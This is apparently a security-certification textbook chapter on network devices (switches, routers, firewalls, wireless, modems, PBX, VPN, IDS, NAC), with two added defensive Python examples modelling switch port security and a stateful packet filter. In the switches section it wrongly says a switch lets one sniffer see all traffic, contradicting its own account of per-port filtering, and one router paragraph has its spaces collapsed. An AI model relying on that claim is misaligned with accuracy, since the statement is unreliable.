Bridges are networking equipment that connect devices using the same protocol at the data link layer of the OSI model. A bridge operates at the data link layer, filtering traffic based on MAC addresses. Bridges can reduce collisions by separating pieces of a network into two separate collision domains, but this only cuts the collision problem in half. Although bridges are useful, a better solution is to use switches for network connections.
Switches
A switch forms the basis for connections in most Ethernet-based LANs. Although hubs and bridges still exist, in today’s high-performance network environment, switches have replaced both. A switch has separate collision domains for each port. This means that for each port, two collision domains exist: one from the port to the client on the downstream side, and one from the switch to the network upstream. When full duplex is employed, collisions are virtually eliminated from the two nodes, host and client. This also acts as a hub-based system, where a single sniffer can see all of the traffic to and from connected devices. Switches operate at the data link layer, while routers act at the network layer. For intranets, switches have become what routers are on the Internet—the device of choice for connecting machines. As switches have become the primary network connectivity device, additional functionality has been added to them. A switch is usually a Layer 2 device, but Layer 3 switches incorporate routing functionality.
Hubs have been replaced by switches because switches perform a number of features that hubs cannot perform. For example, the switch improves network performance by filtering traffic. It filters traffic by only sending the data to the port on the switch that the destination system resides on. The switch knows what port each system is connected to and sends the data only to that port. The switch also provides security features, such as the option to disable a port so that it cannot be used without authorization. The switch also supports a feature called port security, which allows the administrator to control which systems can send data to each of the ports. The switch uses the MAC address of the systems to incorporate traffic filtering and port security features, which is why it is considered a Layer 2 device.
Exam Tip: MAC filtering can be employed on switches, permitting only specified MACs to connect to the switch. This can be bypassed if an attacker can learn an allowed MAC, as they can clone the permitted MAC onto their own NIC card and spoof the switch. To filter edge connections, IEEE 802.1X is more secure and is covered in Chapter 11. This can also be referred to as MAC limiting. Be careful to pay attention to context on the exam, however, because MAC limiting also can refer to preventing flooding attacks on switches by limiting the number of MAC addresses that can be “learned” by a switch.
Port address security based on MAC addresses can determine whether a packet is allowed or blocked from a connection. This is the very function that a firewall uses for its determination, and this same functionality is what allows an 802.1X device to act as an “edge device.”
Exam Tip: Network traffic segregation by switches can also act as a security mechanism, preventing access to some devices from other devices. This can prevent someone from accessing critical data servers from a machine in a public area.
One of the security concerns with switches is that, like routers, they are intelligent network devices and are therefore subject to hijacking by hackers. Should a hacker break into a switch and change its parameters, he might be able to eavesdrop on specific or all communications, virtually undetected. Switches are commonly administered using the Simple Network Management Protocol (SNMP) and Telnet protocol, both of which have a serious weakness in that they send passwords across the network in clear text. A hacker armed with a sniffer that observes maintenance on a switch can capture the administrative password. This allows the hacker to come back to the switch later and configure it as an administrator. An additional problem is that switches are shipped with default passwords, and if these are not changed when the switch is set up, they offer an unlocked door to a hacker.
To secure a switch, you should disable all access protocols other than a secure serial line or a secure protocol such as Secure Shell (SSH). Using only secure methods to access a switch will limit the exposure to hackers and malicious users. Maintaining secure network switches is even more important than securing individual boxes, for the span of control to intercept data is much wider on a switch, especially if it’s reprogrammed by a hacker.
Switches are also subject to electronic attacks, such as ARP poisoning and MAC flooding. ARP poisoning is where a device spoofs the MAC address of another device, attempting to change the ARP tables through spoofed traffic and the ARP table-update mechanism. MAC flooding is where a switch is bombarded with packets from different MAC addresses, flooding the switch table and forcing the device to respond by opening all ports and acting as a hub. This enables devices on other segments to sniff traffic.
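A small model of the switch-side defenses for the attacks just described and for the VLAN isolation discussed in Chapter 9, added here as an example and not code from the book: port security caps how many source MACs a port may learn (so a flood of new addresses is flagged instead of filling the table), an ARP watch flags an IP that suddenly answers from a different MAC, and a per-port VLAN map keeps frames inside their VLAN and sends unused ports to a parking VLAN. The event lines, port names, MACs and IPs are constructed; a real switch would errdisable or drop on a port-security violation rather than just record it.

```python
import re
from collections import defaultdict
from typing import Dict, Optional

UNUSED_VLAN = 999   # parking VLAN for unused ports; constructed value

# Constructed event stream, in the shape a monitor fed from switch logs might see.
SAMPLE_EVENTS = """\
FRAME port=Gi0/1 src=00:07:e9:7c:c8:aa
FRAME port=Gi0/1 src=00:07:e9:7c:c8:aa
FRAME port=Gi0/3 src=00:07:e9:00:00:01
FRAME port=Gi0/3 src=00:07:e9:00:00:02
FRAME port=Gi0/3 src=00:07:e9:00:00:03
FRAME port=Gi0/3 src=00:07:e9:00:00:04
FRAME port=Gi0/3 src=00:07:e9:00:00:05
ARP ip=10.0.0.1 mac=00:07:e9:7c:c8:aa
ARP ip=10.0.0.1 mac=00:07:e9:7c:c8:aa
ARP ip=10.0.0.1 mac=00:07:e9:ab:cd:ef
"""

EVENT_RE = re.compile(r"^(FRAME|ARP)\s+(.*)$")


class SwitchMonitor:
    """Port security, an ARP-binding watch, and VLAN isolation in one small model."""

    def __init__(self, max_macs_per_port: int = 2, port_vlan: Optional[Dict[str, int]] = None):
        self.max_macs = max_macs_per_port
        self.port_vlan = port_vlan or {}
        self.port_macs = defaultdict(set)   # port -> source MACs learned on it
        self.arp_bindings = {}              # IP -> MAC first seen answering for it
        self.alerts = []

    def learn(self, port: str, src_mac: str) -> str:
        """Port security: after the quota is reached, every new source MAC is a violation."""
        macs = self.port_macs[port]
        if src_mac in macs:
            return "known"
        if len(macs) >= self.max_macs:
            self.alerts.append(("mac_flood", port, src_mac))
            return "violation"
        macs.add(src_mac)
        return "learned"

    def arp_seen(self, ip: str, mac: str) -> str:
        """ARP watch: a known IP answering from a new MAC is the poisoning signature."""
        prior = self.arp_bindings.setdefault(ip, mac)
        if prior != mac:
            self.alerts.append(("arp_change", ip, prior, mac))
            return "conflict"
        return "consistent"

    def may_forward(self, in_port: str, out_port: str) -> bool:
        """VLAN isolation: frames stay in their VLAN, and the parking VLAN leads nowhere."""
        src_vlan = self.port_vlan.get(in_port, UNUSED_VLAN)
        dst_vlan = self.port_vlan.get(out_port, UNUSED_VLAN)
        return src_vlan == dst_vlan and src_vlan != UNUSED_VLAN


def replay(events: str, max_macs_per_port: int = 2,
           port_vlan: Optional[Dict[str, int]] = None) -> SwitchMonitor:
    """Feed 'FRAME port=... src=...' and 'ARP ip=... mac=...' lines through the monitor."""
    monitor = SwitchMonitor(max_macs_per_port, port_vlan)
    for line in events.splitlines():
        match = EVENT_RE.match(line.strip())
        if not match:
            continue                                  # ignore anything else in the log
        kind, rest = match.groups()
        fields = dict(item.split("=", 1) for item in rest.split())
        if kind == "FRAME":
            monitor.learn(fields["port"], fields["src"])
        else:
            monitor.arp_seen(fields["ip"], fields["mac"])
    return monitor


if __name__ == "__main__":
    for alert in replay(SAMPLE_EVENTS).alerts:
        print(alert)
```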
Loop Protection
Switches operate at Layer 2, at which there is no countdown mechanism to kill packets that get caught in loops or on paths that will never resolve. The Layer 2 space acts as a mesh, where potentially the addition of a new device can create loops in the existing device interconnections. To prevent loops, a technology called spanning trees is employed by virtually all switches. The Spanning Tree Protocol (STP) allows for multiple, redundant paths, while breaking loops to ensure a proper broadcast pattern. Loop protection is covered in detail in Chapter 9.
RoutersArouterisanetworktrafficmanagementdeviceusedtoconnectdifferentnetworksegmentstogether.Routersoperateatthenetworklayer(Layer3)oftheOSImodel,usingthenetworkaddress(typicallyanIPaddress)toroutetrafficandusingroutingprotocolstodetermineoptimalroutingpathsacrossanetwork.RoutersformthebackboneoftheInternet,movingtrafficfromnetworktonetwork,inspectingpacketsfromeverycommunicationastheymovetrafficinoptimalpaths.Routersoperatebyexaminingeachpacket,lookingatthedestination
address,andusingalgorithmsandtablestodeterminewheretosendthepacketnext.Thisprocessofexaminingtheheadertodeterminethenexthopcanbedoneinquickfashion.
ACLs can require significant effort to establish and maintain. Creating them is a straightforward task, but their judicious use will yield security benefits with a limited amount of maintenance. Cisco routers have standard and extended ACLs; standard ACLs can filter traffic based only on the source IP address, whereas extended ACLs can filter traffic by source/destination IP address, protocol, and port. This can be very important in security zones such as a DMZ and at edge devices, blocking undesired outside contact while allowing known inside traffic.
Routers use access control lists (ACLs) as a method of deciding whether a packet is allowed to enter the network. With ACLs, it is also possible to examine the source address and determine whether or not to allow a packet to pass. This allows routers equipped with ACLs to drop packets according to rules built into the ACLs. This can be a cumbersome process to set up and maintain, and as the ACL grows in size, routing efficiency can be decreased. It is also possible to configure some routers to act as quasi-application gateways, performing stateful packet inspection and using contents as well as IP addresses to determine whether or not to permit a packet to pass. This can tremendously increase the time for a router to pass traffic and can significantly decrease router throughput. Configuring ACLs and other aspects of setting up routers for this type of use are beyond the scope of this book.
One serious security concern regarding router operation is limiting who has access to the router and control of its internal functions. Like a switch, a router can be accessed using SNMP and Telnet and programmed remotely. Because of the geographic separation of routers, this can become a necessity, for many routers in the world of the Internet can be hundreds of miles apart, in separate locked structures. Physical control over a router is absolutely necessary, for if any device, be it a server, switch, or router, is physically accessed by a hacker, it should be considered compromised. Thus, such access must be prevented. As with switches, it is important to ensure that the administrator password is never passed in the clear, that only secure mechanisms are used to access the router, and that all of the default passwords are reset to strong passwords.
As with switches, the most assured point of access for router management control is via the serial control interface port. This allows access to the control aspects of the router without having to deal with traffic-related issues. For internal company networks, where the geographic dispersion of routers may be limited, third-party solutions to allow out-of-band remote management exist. This allows complete control over the router in a secure fashion, even from a remote location, although additional hardware is required.
Routers are available from numerous vendors and come in sizes big and small. A typical small home office router for use with cable modem/DSL service is shown in Figure 10.2. Larger routers can handle traffic of up to tens of gigabytes per second per channel, using fiber-optic inputs and moving tens of thousands of concurrent Internet connections across the network. These routers, which can cost hundreds of thousands of dollars, form an essential part of e-commerce infrastructure, enabling large enterprises such as Amazon and eBay to serve many customers concurrently.
• Figure 10.2 A small home office router for cable modem/DSL
Firewalls
A firewall is a network device—hardware, software, or a combination thereof—whose purpose is to enforce a security policy across its connections by allowing or denying traffic to pass into or out of the network. A firewall is a lot like a gate guard at a secure facility. The guard examines all the traffic trying to enter the facility—cars with the correct sticker or delivery trucks with the appropriate paperwork are allowed in; everyone else is turned away (see Figure 10.3).
• Figure 10.3 How a firewall works
Exam Tip: A firewall is a network device (hardware, software, or combination of the two) that enforces a security policy. All network traffic passing through the firewall is examined—traffic that does not meet the specified security criteria or violates the firewall policy is blocked.
The heart of a firewall is the set of security policies that it enforces. Management determines what is allowed in the form of network traffic between devices, and these policies are used to build rule sets for the firewall devices used to filter network traffic across the network.
Tech Tip
Firewall Rules
Firewalls are in reality policy enforcement devices. Each rule in a firewall should have a policy behind it, as this is the only manner of managing firewall rule sets over time. The steps for successful firewall management begin and end with maintaining a policy list by firewall of the traffic restrictions to be imposed. Managing this list via a configuration management process is important to prevent network instabilities from faulty rule sets or unknown "left-over" rules.
Orphan or left-over rules are rules that were created for a special purpose (testing, emergency, visitor or vendor, etc.) and then forgotten about and not removed after their use ended. These rules can clutter up a firewall and result in unintended challenges to the network security team.
Firewall security policies are a series of rules that defines what traffic is permissible and what traffic is to be blocked or denied. These are not universal rules, and there are many different sets of rules for a single company with multiple connections. A web server connected to the Internet may be configured only to allow traffic on port 80 for HTTP, and have all other ports blocked. An e-mail server may have only necessary ports for e-mail open, with others blocked. A key to security policies for firewalls is the same as has been seen for other security policies—the principle of least access. Only allow the necessary access for a function; block or deny all unneeded functionality. How an organization deploys its firewalls determines what is needed for security policies for each firewall. You may even have a small office–home office firewall at your house, such as the RVS4000 shown in Figure 10.4. This device from Linksys provides both routing and firewall functions.
• Figure 10.4 Linksys RVS4000 SOHO firewall
The security topology determines what network devices are employed at what points in a network. At a minimum, the corporate connection to the Internet should pass through a firewall, as shown in Figure 10.5. This firewall should block all network traffic except that specifically authorized by the security policy. This is actually easy to do: blocking communications on a port is simply a matter of telling the firewall to close the port. The issue comes in deciding what services are needed and by whom, and thus which ports should be open and which should be closed. This is what makes a security policy useful but, in some cases, difficult to maintain.
• Figure 10.5 Logical depiction of a firewall protecting an organization from the Internet
The perfect firewall policy is one that the end user never sees and one that never allows even a single unauthorized packet to enter the network. As with any other perfect item, it will be rare to find the perfect security policy for a firewall. To develop a complete and comprehensive security policy, it is first necessary to have a complete and comprehensive understanding of your network resources and their uses. Once you know what your network will be used for, you will have an idea of what to permit. Also, once you understand what you need to protect, you will have an idea of what to block. Firewalls are designed to block attacks before they get to a target machine. Common targets are web servers, e-mail servers, DNS servers, FTP services, and databases. Each of these has separate functionality, and each of these has separate vulnerabilities. Once you have decided who should receive what type of traffic and what types should be blocked, you can administer this through the firewall.
Routers help control the flow of traffic into and out of your network. Through the use of ACLs, routers can act as first-level firewalls and can help weed out malicious traffic.
How Do Firewalls Work?
Firewalls enforce the established security policies. They can do this through a variety of mechanisms, including:
Network Address Translation (NAT) As you may remember from Chapter 9, NAT translates private (nonroutable) IP addresses into public (routable) IP addresses.
Basic packet filtering Basic packet filtering looks at each packet entering or leaving the network and then either accepts the packet or rejects the packet based on user-defined rules. Each packet is examined separately.
Stateful packet filtering Stateful packet filtering also looks at each packet, but it can examine the packet in its relation to other packets. Stateful firewalls keep track of network connections and can apply slightly different rule sets based on whether the packet is part of an established session or not.
NAT is the process of modifying network address information in datagram packet headers while in transit across a traffic routing device, such as a router or firewall, for the purpose of remapping a given address space into another. See Chapter 9 for a more detailed discussion on NAT.
Access control lists (ACLs) ACLs are simple rule sets that are applied to port numbers and IP addresses. They can be configured for inbound and outbound traffic and are most commonly used on routers and switches.
Application layer proxies An application layer proxy can examine the content of the traffic as well as the ports and IP addresses. For example, an application layer proxy has the ability to look inside a user's web traffic, detect a malicious website attempting to download malware to the user's system, and block the malware.
One of the most basic security functions provided by a firewall is NAT. This service allows you to mask significant amounts of information from outside of the network. This allows an outside entity to communicate with an entity inside the firewall without truly knowing its address.
Basic packet filtering, also known as stateless packet inspection, involves looking at packets, their protocols and destinations, and checking that information against the security policy. Telnet and FTP connections may be prohibited from being established to a mail or database server, but they may be allowed for the respective service servers. This is a fairly simple method of filtering based on information in each packet header, like IP addresses and TCP/UDP ports. This will not detect and catch all undesired packets, but it is fast and efficient.
To look at all packets, determining the need for each and its data, requires stateful packet filtering. Advanced firewalls employ stateful packet filtering to prevent several types of undesired communications. Should a packet come from outside the network, in an attempt to pretend that it is a response to a message from inside the network, the firewall will have no record of it being requested and can discard it, blocking access. As many communications will be transferred to high ports (above 1023), stateful monitoring will enable the system to determine which sets of high-port communications are permissible and which should be blocked. The disadvantage to stateful monitoring is that it takes significant resources and processing to do this type of monitoring, and this reduces efficiency and requires more robust and expensive hardware. However, this type of monitoring is essential in today's comprehensive networks, particularly given the variety of remotely accessible services.
Tech Tip
Firewalls and Access Control Lists
Many firewalls read firewall and ACL rules from top to bottom and apply the rules in sequential order to the packets they are inspecting. Typically they will stop processing rules when they find a rule that matches the packet they are examining. If the first line in your rule set reads "allow all traffic," then the firewall will pass any network traffic coming into or leaving the firewall—ignoring the rest of your rules below that line. Many firewalls have an implied "deny all" line as part of their rule sets. This means that any traffic that is not specifically allowed by a rule will get blocked by default.
As they are in routers, switches, servers, and other network devices, ACLs are a cornerstone of security in firewalls. Just as you must protect the device from physical access, ACLs do the same task for electronic access. Firewalls can extend the concept of ACLs by enforcing them at a packet level when packet-level stateful filtering is performed. This can add an extra layer of protection, making it more difficult for an outside hacker to breach a firewall.
Exam Tip: Many firewalls contain, by default, an implicit deny at the end of every ACL or firewall rule set. This simply means that any traffic not specifically permitted by a previous rule in the rule set is denied.
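The following added example (not from the book, and not any vendor's rule syntax) puts the last three ideas together in one small packet filter: rules are read top to bottom with first match winning, anything unmatched falls through to an implicit deny, and a connection table lets a genuine reply to a session the LAN opened back in on a high port while an unsolicited "reply" from outside is discarded. It also shows why a standard (source-only) deny has to sit above the extended allow it is meant to override, and what an "allow all traffic" first line does to the rest of the rule set. The rule and packet shapes, addresses and sample traffic are all constructed here.

```python
"""Added example (not from the book): ordered first-match packet filter with
an implicit deny and a stateful session table. Rules, packets and addresses
are constructed for this example; no real product's syntax is used.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

ANY = "any"


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str       # "tcp" or "udp"
    sport: int
    dport: int
    direction: str   # "in" (arriving from the Internet) or "out" (leaving the LAN)


@dataclass(frozen=True)
class Rule:
    """Extended-ACL-style rule on source, destination, protocol and port.
    A standard ACL is the special case where only `src` is set."""
    action: str                  # "allow" or "deny"
    src: str = ANY               # CIDR, single address, or "any"
    dst: str = ANY
    proto: str = ANY
    dport: object = ANY          # int or "any"
    direction: str = ANY
    comment: str = ""


def _net_match(pattern, addr):
    return pattern == ANY or ip_address(addr) in ip_network(pattern)


def _match(rule, pkt):
    return (_net_match(rule.src, pkt.src)
            and _net_match(rule.dst, pkt.dst)
            and rule.proto in (ANY, pkt.proto)
            and rule.dport in (ANY, pkt.dport)
            and rule.direction in (ANY, pkt.direction))


class StatefulFirewall:
    def __init__(self, rules):
        self.rules = list(rules)
        # Sessions the LAN opened, keyed (src, sport, dst, dport, proto).
        self.sessions = set()

    @staticmethod
    def _reply_key(pkt):
        # A reply to an outbound session has source and destination swapped.
        return (pkt.dst, pkt.dport, pkt.src, pkt.sport, pkt.proto)

    def filter(self, pkt):
        """Return (verdict, reason). Rules are read top to bottom and the
        first match wins; no match means the implicit deny applies."""
        # Stateful check: an inbound packet that answers a session the LAN
        # opened is allowed even though it arrives on a high port (>1023).
        if pkt.direction == "in" and self._reply_key(pkt) in self.sessions:
            return "allow", "reply to established session"
        for i, rule in enumerate(self.rules):
            if _match(rule, pkt):
                if rule.action == "allow" and pkt.direction == "out":
                    self.sessions.add(
                        (pkt.src, pkt.sport, pkt.dst, pkt.dport, pkt.proto))
                return rule.action, f"rule {i}: {rule.comment or rule.action}"
        return "deny", "implicit deny"


LAN = "192.168.10.0/24"
WEB = "192.168.10.80"      # public web server inside the LAN

# A sound rule set: the source-only deny sits above the allow it overrides.
GOOD_RULES = [
    Rule("deny", src="203.0.113.0/24", comment="blocked external range"),
    Rule("allow", dst=WEB, proto="tcp", dport=80, direction="in",
         comment="public web server"),
    Rule("allow", src=LAN, direction="out", comment="LAN may initiate"),
]
# The mistake the Tech Tip warns about: "allow all" first shadows everything.
BAD_RULES = [Rule("allow", comment="allow all traffic")] + GOOD_RULES

# Constructed sample traffic.
OUTBOUND = Packet("192.168.10.5", "198.51.100.7", "tcp", 40000, 443, "out")
REAL_REPLY = Packet("198.51.100.7", "192.168.10.5", "tcp", 443, 40000, "in")
FORGED_REPLY = Packet("198.51.100.9", "192.168.10.5", "tcp", 443, 40001, "in")
WEB_VISIT = Packet("198.51.100.7", WEB, "tcp", 5555, 80, "in")
BLOCKED_VISIT = Packet("203.0.113.5", WEB, "tcp", 5555, 80, "in")

if __name__ == "__main__":
    fw = StatefulFirewall(GOOD_RULES)
    for p in (OUTBOUND, REAL_REPLY, FORGED_REPLY, WEB_VISIT, BLOCKED_VISIT):
        print(p.direction, p.src, "->", p.dst, p.dport, fw.filter(p))
    print("with 'allow all' first:", StatefulFirewall(BAD_RULES).filter(FORGED_REPLY))
```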
Some high-security firewalls also employ application layer proxies. As the name implies, packets are not allowed to traverse the firewall, but data instead flows up to an application that in turn decides what to do with it. For example, an SMTP proxy may accept inbound mail from the Internet and forward it to the internal corporate mail server, as depicted in Figure 10.6. While proxies provide a high level of security by making it very difficult for an attacker to manipulate the actual packets arriving at the destination, and while they provide the opportunity for an application to interpret the data prior to forwarding it to the destination, they generally are not capable of the same throughput as stateful packet-inspection firewalls. The trade-off between performance and speed is a common one and must be evaluated with respect to security needs and performance requirements.
• Figure 10.6 Firewall with SMTP application layer proxy
Tech Tip
Firewall Operations
Application layer firewalls such as proxy servers can analyze information in the header and data portion of the packet, whereas packet-filtering firewalls can analyze only the header of a packet.
Firewalls can also act as network traffic regulators in that they can be configured to mitigate specific types of network-based attacks. In denial-of-service and distributed denial-of-service attacks, an attacker can attempt to flood a network with traffic. Firewalls can be tuned to detect these types of attacks and act as flood guards, mitigating the effect on the network.
Exam Tip: Firewalls can act as flood guards, detecting and mitigating specific types of DoS/DDoS attacks.
Next-Generation Firewalls
Firewalls operate by inspecting packets and by using rules associated with IP addresses and ports. Next-generation firewalls have significantly more capability and are characterized by these features:
• Deep packet inspection
• Move beyond port/protocol inspection and blocking
• Add application-level inspection
• Add intrusion prevention
• Bring intelligence from outside the firewall
Next-generation firewalls are more than just a firewall and IDS coupled together; they offer a deeper look at what the network traffic represents. In a legacy firewall, with port 80 open, all web traffic is allowed to pass. Using a next-generation firewall, traffic over port 80 can be separated by website, or even activity on a website (for example, allow Facebook, but not games on Facebook). Because of the deeper packet inspection and the ability to create rules based on content, traffic can be managed based on content, not merely site or URL.
Web Application Firewalls vs. Network Firewalls
Increasingly, the term "firewall" is getting attached to any device or software package that is used to control the flow of packets or data into or out of an organization. For example, a web application firewall is the term given to any software package, appliance, or filter that applies a rule set to HTTP/HTTPS traffic. Web application firewalls shape web traffic and can be used to filter out SQL injection attacks, malware, cross-site scripting (XSS), and so on. By contrast, a network firewall is a hardware or software package that controls the flow of packets into and out of a network. Web application firewalls operate on traffic at a much higher level than network firewalls, as web application firewalls must be able to decode the web traffic to determine whether or not it is malicious. Network firewalls operate on much simpler aspects of network traffic such as source/destination port and source/destination address.
Concentrators
Network devices called concentrators act as traffic management devices, managing flows from multiple points into single streams. Concentrators typically act as endpoints for a particular protocol, such as SSL/TLS or VPN. The use of specialized hardware can enable hardware-based encryption and provide a higher level of specific service than a general-purpose server. This provides both architectural and functional efficiencies.
Wireless Devices
Wireless devices bring additional security concerns. There is, by definition, no physical connection to a wireless device; radio waves or infrared carry data, which allows anyone within range access to the data. This means that unless you take specific precautions, you have no control over who can see your data. Placing a wireless device behind a firewall does not do any good, because the firewall stops only physically connected traffic from reaching the device. Outside traffic can come literally from the parking lot directly to the wireless device and into the network.
The point of entry from a wireless device to a wired network is performed at a device called a wireless access point. Wireless access points can support multiple concurrent devices accessing network resources through the network node they create. A typical wireless access point is shown here.
• A typical wireless access point
To prevent unauthorized wireless access to the network, configuration of remote access protocols to a wireless access point is common. Forcing authentication and verifying authorization is a seamless method of performing basic network security for connections in this fashion. These access protocols are covered in Chapter 11.
Several mechanisms can be used to add wireless functionality to a machine. For PCs, this can be done via an expansion card. For notebooks, a PCMCIA adapter for wireless networks is available from several vendors. For both PCs and notebooks, vendors have introduced USB-based wireless connectors. The following illustration shows one vendor's card—note the extended length used as an antenna. Not all cards have the same configuration, although they all perform the same function: to enable a wireless network connection. The numerous wireless protocols (802.11a, b, g, i, and n) are covered in Chapter 12. Wireless access points and cards must be matched by protocol for proper operation.
Modems
Modems were once a slow method of remote connection that was used to connect client workstations to remote services over standard telephone lines. Modem is a shortened form of modulator/demodulator, converting analog signals to digital and vice versa. Connecting a digital computer signal to the analog telephone line required one of these devices. Today, the use of the term has expanded to cover devices connected to special digital telephone lines—DSL modems—and to cable television lines—cable modems. Although these devices are not actually modems in the true sense of the word, the term has stuck through marketing efforts directed to consumers. DSL and cable modems offer broadband high-speed connections and the opportunity for continuous connections to the Internet. Along with these new desirable characteristics come some undesirable ones, however. Although they both provide the same type of service, cable and DSL modems have some differences. A DSL modem provides a direct connection between a subscriber's computer and an Internet connection at the local telephone company's switching station. This private connection offers a degree of security, as it does not involve others sharing the circuit. Cable modems are set up in shared arrangements that theoretically could allow a neighbor to sniff a user's cable modem traffic.
• A typical PCMCIA wireless network card
Cable modems were designed to share a party line in the terminal signal area, and the cable modem standard, Data Over Cable Service Interface Specification (DOCSIS), was designed to accommodate this concept. DOCSIS includes built-in support for security protocols, including authentication and packet filtering. Although this does not guarantee privacy, it prevents ordinary subscribers from seeing others' traffic without using specialized hardware.
Figure 10.7 is a modern cable modem. It has an embedded wireless access point, a VoIP connection, a local router, and DHCP server. The size of the device is fairly large, but it has a built-in lead-acid battery to provide VoIP service when power is out.
• Figure 10.7 Modern cable modem
Both cable and DSL services are designed for a continuous connection, which brings up the question of IP address life for a client. Although some services originally used a static IP arrangement, virtually all have now adopted the Dynamic Host Configuration Protocol (DHCP) to manage their address space. A static IP address has an advantage of remaining the same and enabling convenient DNS connections for outside users. As cable and DSL services are primarily designed for client services as opposed to host services, this is not a relevant issue. A security issue of a static IP address is that it is a stationary target for hackers. The move to DHCP has not significantly lessened this threat, however, because the typical IP lease on a cable modem DHCP server is for days. This is still relatively stationary, and some form of firewall protection needs to be employed by the user.
Cable/DSL Security
The modem equipment provided by the subscription service converts the cable or DSL signal into a standard Ethernet signal that can then be connected to a NIC on the client device. This is still just a direct network connection, with no security device separating the two. The most common security device used in cable/DSL connections is a router that acts as a hardware firewall. The firewall/router needs to be installed between the cable/DSL modem and client computers.
Telephony
A private branch exchange (PBX) is an extension of the public telephone network into a business. Although typically considered separate entities from data systems, PBXs are frequently interconnected and have security requirements as part of this interconnection, as well as security requirements of their own. PBXs are computer-based switching equipment designed to connect telephones into the local phone system. Basically digital switching systems, they can be compromised from the outside and used by phone hackers (phreakers) to make phone calls at the business's expense. Although this type of hacking has decreased as the cost of long-distance calling has decreased, it has not gone away, and as several firms learn every year, voice mailboxes and PBXs can be compromised and the long-distance bills can get very high, very fast.
Tech Tip
Coexisting Communications
Data and voice communications have coexisted in enterprises for decades. Recent connections inside the enterprise of Voice over IP (VoIP) and traditional private branch exchange (PBX) solutions increase both functionality and security risks. Specific firewalls to protect against unauthorized traffic over telephony connections are available to counter the increased risk.
Another problem with PBXs arises when they are interconnected to the data systems, either by corporate connection or by rogue modems in the hands of users. In either case, a path exists for connection to outside data networks and the Internet. Just as a firewall is needed for security on data connections, one is needed for these connections as well. Telecommunications firewalls are a distinct type of firewall designed to protect both the PBX and the data connections. The functionality of a telecommunications firewall is the same as that of a data firewall: it is there to enforce security policies. Telecommunication security policies can be enforced even to cover hours of phone use, to prevent unauthorized long-distance usage through the implementation of access codes and/or restricted service hours.
VPN Concentrator
A virtual private network (VPN) is a construct used to provide a secure communication channel between users across public networks such as the Internet. The most common implementation of VPN is via IPsec, a protocol for IP security. IPsec is mandated in IPv6 and is optional in IPv4. IPsec can be implemented in hardware, software, or a combination of both and is used to encrypt all IP traffic. In Chapter 11, a variety of techniques are described that can be employed to instantiate a VPN connection. The use of encryption technologies allows either the data in a packet to be encrypted or the entire packet to be encrypted. If the data is encrypted, the packet header can still be sniffed and observed between source and destination, but the encryption protects the contents of the packet from inspection. If the entire packet is encrypted, it is then placed into another packet and sent via tunnel across the public network. Tunneling can protect even the identity of the communicating parties.
Exam Tip: A VPN concentrator is a hardware device designed to act as a VPN endpoint, managing VPN connections to an enterprise.
Security Devices
There is a range of security devices that can be employed at the network layer to instantiate security functionality in the network layer. Devices can be used for intrusion detection, network access control, and a wide range of other security functions. Each device has a specific network function and plays a role in maintaining network infrastructure security.
Intrusion Detection Systems
Intrusion detection systems (IDSs) are an important element of infrastructure security. IDSs are designed to detect, log, and respond to unauthorized network or host use, both in real time and after the fact. IDSs are available from a wide selection of vendors and are an essential part of a comprehensive network security program. These systems are implemented using software, but in large networks or systems with significant traffic levels, dedicated hardware is typically required as well. IDSs can be divided into two categories: network-based systems and host-based systems.
Cross Check
Intrusion Detection
From a network infrastructure point of view, network-based IDSs can be considered part of infrastructure, whereas host-based IDSs are typically considered part of a comprehensive security program and not necessarily infrastructure. Two primary methods of detection are used: signature-based and anomaly-based. IDSs are covered in detail in Chapter 13.
Network Access Control
Networks comprise connected workstations and servers. Managing security on a network involves managing a wide range of issues, from various connected hardware and the software operating these devices. Assuming that the network is secure, each additional connection involves risk. Managing the endpoints on a case-by-case basis as they connect is a security methodology known as network access control. Two main competing methodologies exist that deal with network access control: Network Access Protection (NAP) is a Microsoft technology for controlling network access of a computer host, and Network Admission Control (NAC) is Cisco's technology for controlling network admission.
Tech Tip
NAC and NAP Interoperability
Although Microsoft's NAP and Cisco's NAC appear to be competing methodologies, they are in fact complementary. NAP allows much finer-grain control for Windows-based devices, while NAC is a more general-purpose methodology for controlling admission through edge devices. Recognizing how they can work together, Microsoft and Cisco have deployed guides on how to combine these two systems, preserving the advantages and investments in each.
Microsoft's NAP system is based on measuring the system health of the connecting machine, including patch levels of the OS, antivirus protection, and system policies. The objective behind NAP is to enforce policy and governance standards on network devices before they are allowed data-level access to a network. NAP was first utilized in Windows XP Service Pack 3, Windows Vista, and Windows Server 2008, and it requires additional infrastructure servers to implement the health checks. The system includes enforcement agents that interrogate clients and verify admission criteria. Admission criteria can include client machine ID, status of updates, and so forth. Using NAP, network administrators can define granular levels of network access based on multiple criteria: who a client is, what groups a client belongs to, and the degree to which that client is compliant with corporate client health requirements. These health requirements include OS updates, antivirus updates, and critical patches. Response options include rejection of the connection request or restriction of admission to a subnet. NAP also provides a mechanism for automatic remediation of client health requirements and restoration of normal access when healthy.
Cisco's NAC system is built around an appliance that enforces policies chosen by the network administrator. A series of third-party solutions can interface with the appliance, allowing the verification of many different options, including client policy settings, software updates, and client security posture. The use of third-party devices and software makes this an extensible system across a wide range of equipment.
Both Cisco NAC and Microsoft NAP are in their early stages of widespread implementation, with only large enterprises typically taking these steps. Although they have been available for over 5 years, they are not being embraced across most firms. The concept of automated admission checking based on client device characteristics is here to stay, as it provides timely control in the ever-changing network world of today's enterprises.
Network Monitoring/Diagnostic
A computer network itself can be considered a large computer system, with performance and operating issues. Just as a computer needs management, monitoring, and fault resolution, so do networks. SNMP was developed to perform this function across networks. The idea is to enable a central monitoring and control center to maintain, configure, and repair network devices, such as switches and routers, as well as other network services, such as firewalls, IDSs, and remote access servers. SNMP has some security limitations, and many vendors have developed software solutions that sit on top of SNMP to provide better security and better management tool suites.
SNMP, Simple Network Management Protocol, is a part of the Internet Protocol suite of protocols. It is an open standard, designed for transmission of management functions between devices. Do not confuse this with SMTP, Simple Mail Transfer Protocol, which is used to transfer mail between machines.
The concept of a network operations center (NOC) comes from the old phone company network days, when central monitoring centers monitored the health of the telephone network and provided interfaces for maintenance and management. This same concept works well with computer networks, and companies with midsize and larger networks employ the same philosophy. The NOC allows operators to observe and interact with the network, using the self-reporting and, in some cases, self-healing nature of network devices to ensure efficient network operation. Although generally a boring operation under normal conditions, when things start to go wrong, as in the case of a virus or worm attack, the NOC can become a busy and stressful place as operators attempt to return the system to full efficiency while not interrupting existing traffic.
